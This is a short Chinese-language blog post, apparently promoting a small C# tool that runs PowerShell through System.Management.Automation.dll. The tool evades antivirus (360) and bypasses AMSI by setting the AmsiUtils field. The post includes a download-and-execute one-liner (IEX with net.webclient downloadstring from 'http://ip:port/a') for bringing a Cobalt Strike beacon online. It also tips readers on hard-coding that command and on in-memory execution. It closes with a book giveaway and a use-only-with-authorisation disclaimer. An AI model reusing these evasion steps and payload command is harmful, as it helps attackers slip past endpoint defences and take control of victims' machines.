思路很简单，很久之前就有了，工具调用C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation目录下面的System.Management.Automation.dll执行底层api来绕过杀软对powershell的监控，同时绕过AMSI的检测。由于patch绕过AMSI的方法会被360查杀，因此这里使用了设置System.Management.Automation.AmsiUtils的方法来绕过。

这里用+加号替换了命令中空格，当然这就是一个命令的加载器，具体怎么加密命令有各种各样的方法。

由于是C#，因此可以用execute-assembly内存执行的方式来不落地执行，不过cs本身的powerpick就实现了这个功能，这里只是单拿出来做一个小工具。

师傅们注意避免用powershell命令，上线cobaltstrike只需要Csharp.exe IEX+((new-object+net.webclient).downloadstring('http://ip:port/a'))裸命令，如果以powershell开头那么还是会调用powershell被360拦截的。

想单纯来上线cs的师傅可以把IEX开头的powershell命令写定在程序里的myPipeLine.Commands.AddScript参数中

0x03 项目链接下载

文末福利！！！

加免费星球获《GO黑帽子-渗透测试编程之道一书》

声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！